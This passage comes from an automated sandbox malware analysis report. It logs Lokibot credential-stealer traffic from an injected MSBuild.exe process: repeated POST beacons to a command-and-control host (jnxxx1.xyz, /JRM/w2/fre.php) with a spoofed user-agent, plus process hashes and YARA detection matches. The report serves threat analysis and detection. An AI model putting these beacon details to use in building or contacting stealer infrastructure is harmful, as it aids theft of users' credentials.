                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  52192.168.2.449888172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:08.256758928 CET10873OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:08.628438950 CET10874INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K4YnnLQtqyJuefNYYKikgzJrngap6sTAVTPPvew1P%2F7Oa%2Bf6vZF%2BW%2FV08Oo8cjXWmDEFIOnUO2lRRyCE%2FL4ECn2ClYktiFCuu7PnRzjrzvX46B0krV30HPYF7Xdt"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73334ad414a73-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  53192.168.2.449889104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:09.950747967 CET10875OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:10.356292963 CET10876INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z6s77jzji2vfKUYleFFTMqFAUQZaKVh7kFWBEXUKoNj9Y6WH%2Fa5s5xL%2Bp5gUW7GoCLj28Ivg7OYZPP%2FVub3llgRwmwyFPtrnaiLVUSmfFMt47erpCDstVXJr7ifb"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7333f3fd25c74-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  54192.168.2.449890172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:11.589921951 CET10877OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:11.970370054 CET10878INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N1%2BDMtyMNg2FgxsUNKVqRu0%2BBqCdVjMXRahhw7AAfGBzwp76HOkFt68cc7qsVxNZul6jdbraWpy0GeEjheLCMjrZVh5xt9SYpgkrH%2BtVw019nUJ4OXA9rWCB4HOo"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd733497d378bd5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  55192.168.2.449891104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:13.021372080 CET10879OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:13.388837099 CET10880INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ErifryXAmgjblGKi53wYAZQGp5R0%2FcoEwdCAEmo%2B3PEt8ccX1SQwBVBDrhf3JXDokdIeALxvnXr9LY9Y%2B%2BdMazki75oG5oEAuTg9frnxiTK9PR5x3rp2NCmCFSel"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd733527cc439e1-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  56192.168.2.449892172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:14.416693926 CET10881OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:14.794965029 CET10882INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EXDyk6top6qwvTX4C%2BdfwAf8npHR6pwJr%2B0jFvkC9D2m%2FymaoLo63V59bdofbjosNWHEL118cPpmwm10onxw0NtO8vvtUPpdJSxtUCkRu0pgSyTCmbpvEPGUMfkc"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7335b3af63b4f-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  57192.168.2.449893104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:15.866209030 CET10883OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:16.288630009 CET10884INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AlYDfsN5GbpkMBD6h7eHRDqKqcOppS2kibcwZqb8eUC4CHNpLCvKM2GC379K5up1i8eTxZKvZB1ya%2B3ZUAnQEdmJEWsjJFoZZJWNtZSVT%2FgyS558TJdheyVjERsc"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7336448f48741-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  58192.168.2.449894104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:17.283951998 CET10885OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:17.637202978 CET10886INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PMcBahuKByTbFosahzRIKypVcDYCLDFflrd1nc56iJvyDP%2Bh45WlKRRvvhMXjJh88q4YEHytsOIDoJi3TTV5f1VcbhoAXrQ2PqU%2BzYC9KTSSSp7XyiTuJZcFrnIz"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7336d1a925c80-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  59192.168.2.449895104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:18.647021055 CET10887OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:19.002940893 CET10888INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BgDckXZkiAvUVc%2BKzyt786ncrFUI%2B0WkMGYATSCVOlSWpwMf4HbqhvSUOnvBxN2h6OKRG2Xr0rlUZTCPS16lMYSOpIyP29QS5FsrDWfOFvEA1ONpOtQWgmdsJ30%2F"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7337598bd699b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.449776172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:27.981179953 CET1331OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:28.344696045 CET1332INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TxJWTM6gV0MTxW7YM%2BTe%2B5DdsSmvL7k%2B35hgMP2DQenr130cmDAXD5htYd6lP4ns1u%2BwYFYQpq9PcE8CaPi6IhueR49tx%2Bl%2F%2FlT90EymPUkUKZlCqPx0CkQ2beeU"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730c1fdb84ed9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.449777172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:30.190932989 CET1333OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:30.670999050 CET1334INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M68OGhqQEPxISEtsq3%2B5H%2FacME1RbwOvO0nDBEz1uxYpVByK3taPs0%2Fqmqaw72x63%2BIeUJaLo%2FOxOewiB042x6no%2B9SIy1aKbFAO63Js7EYkJ%2FigW6rsaVY9WXkN"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730cfca0f2199-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.449778104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:31.656934023 CET1335OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:32.048904896 CET1336INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bLPL1apjWIi%2FQT07ycYbV1MKsMRYQ3dKEOqXP4PeN3UTzD3LbRQE6A7cE1yOR4GeNNfNzZpHhyijJcKc067J50RlhtmlwjQoY1%2BXZ68si4VJhySftXIBnfteo2uk"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730d8fb134bdd-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.449779172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:33.128240108 CET1337OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:33.700928926 CET1338INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BZtSZWSuZoGDTDEek1iQ%2BbCSgcHWt2TDaku2Hp9VK0tn7OUHo%2BuTrbydgLb3W49GEdKDwuRX4Do57txLMlkGOK5k00FDPIaLLAv0EHeQc62Uz0VEE8IZW6spjHk3"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730e228f8717b-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: gunzipped.exe PID: 7116 Parent PID: 2512

                  General

                  Start time:14:25:12
                  Start date:14/01/2022
                  Path:C:\Users\user\Desktop\gunzipped.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                  Imagebase:0x3f0000
                  File size:207368 bytes
                  MD5 hash:A76B143E354A2AC9F363616FF4F8B239
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Analysis Process: MSBuild.exe PID: 1852 Parent PID: 7116

                  General

                  Start time:14:25:14
                  Start date:14/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                  Imagebase:0x510000
                  File size:261728 bytes
                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.931659993.0000000000C58000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.734712266.0000000000C6F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >